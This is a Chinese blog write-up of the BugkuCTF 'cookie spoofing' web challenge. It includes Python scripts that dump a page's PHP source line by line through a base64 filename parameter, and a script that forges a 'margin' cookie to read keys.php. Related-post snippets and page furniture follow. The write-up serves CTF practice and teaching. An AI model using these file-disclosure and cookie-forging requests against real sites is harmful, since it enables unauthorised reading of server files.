BugkuCTF:cookies欺骗(web)

最新推荐文章于 2024-03-12 22:42:04 发布
最新推荐文章于 2024-03-12 22:42:04 发布
阅读量2.5k 收藏 5
点赞数 4
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/changer_WE/article/details/88978647
版权
  • 题目描述:

      点开链接,给了一串字符,这里只是一部分:

      rfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaiheg

  • Burp抓包,发现没什么效果:

              

  • 思路

但,包里面的 GET /web11/index.php?line=&filename=a2V5cy50eHQ= HTTP/1.1  中的  a2V5cy50eHQ=  引起我的注意,base64解码一下,之后发现是 key.txt ,试了试在浏览器端直接访问http://123.206.87.240:8002/web11/key.txt,但是它与一开始的题目描述里的内容并无区别,然后,思路有点断了,之后看看别的博客,才注意到这个逻辑,php解析的时候 line 表示的是行号,filename是对于文件内容的读取,所以,直接构造一个逻辑矛盾,让filename去读自己即读index.php,既然key.txt是被编码过的,那么这里的index.php也要base64编码一下,之后报错,取line=1,相应的URL是:

http://123.206.87.240:8002/web11/index.php?line=1&filename=aW5kZXgucGhw

报错结果,直接性的源码泄露:              

                   

 

  • 写个脚本自动读个几十行: 
    import requests
url1 = "http://123.206.87.240:8002/web11/index.php?line="
url2 = "&filename=aW5kZXgucGhw"
mysession = requests.session()
for i in range(0, 40):
    r = mysession.get(url1+str(i)+url2)
    print(r.text)

     

  • 读取结果: 
    <?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:""); //表示有filename的话获取其内容,没有的话就赋值为空
$line=isset($_GET['line'])?intval($_GET['line']):0;  //line有值直接获取,无值赋值为0
if($file=='') 
header("location:index.php?line=&filename=a2V5cy50eHQ=");    //设置我们看到的URL
$file_list = array(    //关联型数组
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){//接下来的指示,cookie中的margin参数要设置,且要等于'margin'
$file_list[2]='keys.php';    //在数组中加入keys.php,这应该存着flag
}
if(in_array($file, $file_list)){//看我们传入的filename的值是否在上面的数组中
$fa = file($file);    //是则以文件的方式打开
echo $fa[$line];      //按line行号,输出
}
?>

大概意思是:要把cookie中设置margin参数为'margin'且要修改filename是keys.php的base64编码的内容,即可获取flag

  • 使用Burpsuite,抓到包后发送到Repeater:

                   

  • 或者可以写个脚本:
import requests
url = "http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy5waHA="  # filename替换为keys.php的base64加密后的内容
mysession = requests.session()
cookies = {'margin': 'margin'}
r = mysession.post(url, cookies=cookies)
print(r.text)

 

知识点:

  • int intval ( mixed $var [, int $base = 10 ] )
    用于获取变量的整数值,$var:要转换成 integer 的数量值,$base:转化所使用的进制
    intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。
  • php array分为两类:关联性(类似python字典),数值型(正常)
  • in_array(search,array,type)
    要搜索的数据,要搜索的数组,数据的类型(可选。如果设置该参数为 true,则检查搜索的数据与数组的值的类型是否相同。)
    search参数在php4之后就可以是数组类型了
  • file(path,include_path,context)    把整个文件读入一个数组中
    path规定要读取的文件
    include_path可选。如果也想在 include_path 中搜寻文件的话,可以将该参数设为 "1"
    context规定文件句柄的环境。context 是一套可以修改流的行为的选项。若使用 NULL,则忽略
  • 与_COOKIE['xxx']对应的是  setcookie(name, value, expire, path, domain);
     
s0i1
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来
CTFweb篇-Cookies欺骗
热门推荐
weixin_44597701的博客
08-06 1万+
什么是cookie 其实cookies是由网络服务器存储在你电脑硬盘上的一个txt类型的小文件,它和你的网络浏览行为有关,所以存储在你电脑上的cookies就好像你的一张身份证,你电脑上的cookies和其他电脑上的cookies是不一样的;cookies不能被视作代码执行,也不能成为病毒,所以它对你基本无害。 cookie可以在报文头的前面进行设置。 例题: 打开是一连串字母,没有用处 于是从URL入手,http://123.206.87.240:8002/web11/index.php?line=&a
Bugku CTF web20(Web
ChaoYue_miku的博客
03-03 681
0、打开网页,只看到很长的字符串,其实并没有任何提示 查看题目描述:cookies欺骗 rfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiaf.
BUGKU-WEB cookies
最新发布
天泽岁月
03-12 1082
BUGKU-WEB cookie欺骗
BugkuWeb题目解析
北观止的博客
07-31 6930
BugkuWeb 1.web2 解析: 源码中有注释 答案: KEY{Web-2-bugKssNNikls9100} 2、计算器 题目出现了一个很简单的验证码,只要输入正确就可以获得flag,但是尝试后发现题目的输入框只能输入一个数字, 果断审查元素,发现了输入框的最大长度被设置成了1,于是修改输入框的maxlength属性为5 输入结果就可以了 来自 https://www.cnblogs.com/kele1997/p/7595839.html flag{CTF-bugku-0032} 3.Web基础$
bugku-cookies
m0_62094846的博客
10-27 974
一串代码,试过各种解码方式,都没用 这串代码有点像base64,解码得到keys.txt,但代替代码后页面没有信息 那么这串代码可能是某种固定格式,尝试使用其他文件名代替,flag.php,index.php的base64代码依次尝试 但都没获得有用的信息 这时注意到有个line,查找一下 line表示当前文件的行数,后面什么数字都没有,显然无法出现文件 ...
CTF题目记录8
kkzzjx
06-24 886
(还有坑没填好) 最近在刷bugku 感觉对新手还是挺友好的,同时也能学到不少东西,每日更新几题准备记录的吧 秋名山老司机 亲请在2s内计算老司机的车速是多少(最基本的脚本题???) 这题很多平台上都有,脚本必练:request库,re库 一开始不知道哪里传值,但是post一个数据后就会有提示的,发现要post一个value参数 import requests import re url='http://123.206.87.240:8002/qiumingshan/' s=requests.Sessio
BugkuCTF训练题 WEB
Georgeid的博客
02-11 597
WEB2 很简单的一道签到题,右键检查即可看到flag 计算器 看到题目的第一步就是想把正确的计算结果输入进去,但是始终只能输入一个数字,点击验证的话会显示答案错误 后来想到使用抓包的方法来改变数据,但是其实这只是一个前端认证抓包也不会将请求数据发送出去。 查看网页源代码 将代码中最大输入长度改成3,再重新输入正确答案即可获得flag web基础$_GET 这道题也很简单,通过页面里的代...
BUUCTF WEB COOKIE STORE
qq_41696858的博客
05-13 142
emmmm…自从buuctf变为K8S管理以后,靶场就出现了各种非预期解,这题就是典型了吧 我第一遍刷的时候这题还涉及到反序列化,现在属于是纯粹的一个base64编码,改cookie题了 ok,废话少说,打开场景,发现买flag的逻辑,抓包,发现买三种产品的cookie不同,cookie里的session像是base64编码 解码,发现直接是money和history。。。。。。。。。。。。我直接改了不成嘛 补一个这题原先的考点,pickle反序列化和__reduce__魔法方法(更正一下,我好像和pick
cookie 修改欺骗必备工具
12-29
cookie 修改欺骗必备工具 网络安全必备工具
CTF学习记录006-Cookie欺骗、认证、伪造
wupeng_ccab的博客
09-14 559
打开页面显示如下:hello guest. only admin can get flag. 意思很明显需要admin身份才可以。相信用Burp抓包改cookie值 是一样的。今后再遇到类似题目,这是思路方向。把cookie中名称为admin的值0改成1,然后重新加载页面,显示flag。打开页面后,使用浏览器F12开发者工具,找到cookie。题目:Cookie欺骗、认证、伪造。
cookies:Cookies应用
03-30
Cookies 欺骗漏洞的防范方法(vbs+js 实现)
10-29
考虑到 ASP 开发可以采用 vbs 和 js 两种语言,这里同时提供两种语言的程序代码(双语版?YY中……)
js-cookies:JavaScript Cookies API库
05-08
JavaScript Cookies 使用Cookies类在网页中创建Cookies 。 安装 直接安装 有关如何在浏览器中加载脚本的示例: < script type =" text/javascript " src =" /path/to/Cookies.js " > </ script > 要求...
web-ctf-help:脚本集,以帮助基于Web的ctfs
02-24
用法usage: webctf [-h] [-v] [--comments] [--scripts] [--images] [--headers] [--cookies COOKIES] [--flags FLAGS] [-f] urlpositional arguments: url URL of the target websiteoptional arguments: -h, --...
一维码(条形码)&&二维码&&三维码基本原理
s0il的博客
10-10 1万+
一维码:条形码 用于商品时,通常对于每一种物品,它的编码是唯一的,对于普通的一维条码来说,还要通过数据库建立条码与商品信息的对应关系,当条码的数据传到计算机上时,由计算机上的应用程序对数据进行操作和处理。一 维条形码几乎不可能表示汉字和图像信息,但是二维码可以。 构成:                                              静区:指条码左右两端外侧与空的...
BugkuCTF: 秋名山老司机(web
s0il的博客
04-02 3413
题目描述: 亲请在2s内计算老司机的车速是多少 1565348110-1585852319+1424136689-501596850-364488737*872756914-663618483-1120007195*1119001272-1463806595*1200528853=?; 在两秒内刷新页面后会出现提示让提交计算出来的值,且url没有变化,表明确实要两秒内提交 Give me va...
BugkuCTF:flag在index里;输入密码查看flag
s0il的博客
02-16 3046
flag在index里 题目是这样:                                          点击之后是这样:                                              url变成了: http://123.206.87.240:8005/post/index.php?file=show.php 看到大佬的解答,因为有fil...
def get_cookies_dict(cookies): cookies_dict = {} for cookie in cookies.split('; '): cookies_dict[cookie.split('=')[0]] = cookie.split('=')[-1] return cookies_dict
06-06
这是一个Python函数,它的作用是...函数的具体实现过程是:首先创建一个空字典cookies_dict,然后对传入的cookie字符串进行分割,将分割得到的每个cookie键值对以字典形式存储到cookies_dict中,最后返回cookies_dict。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值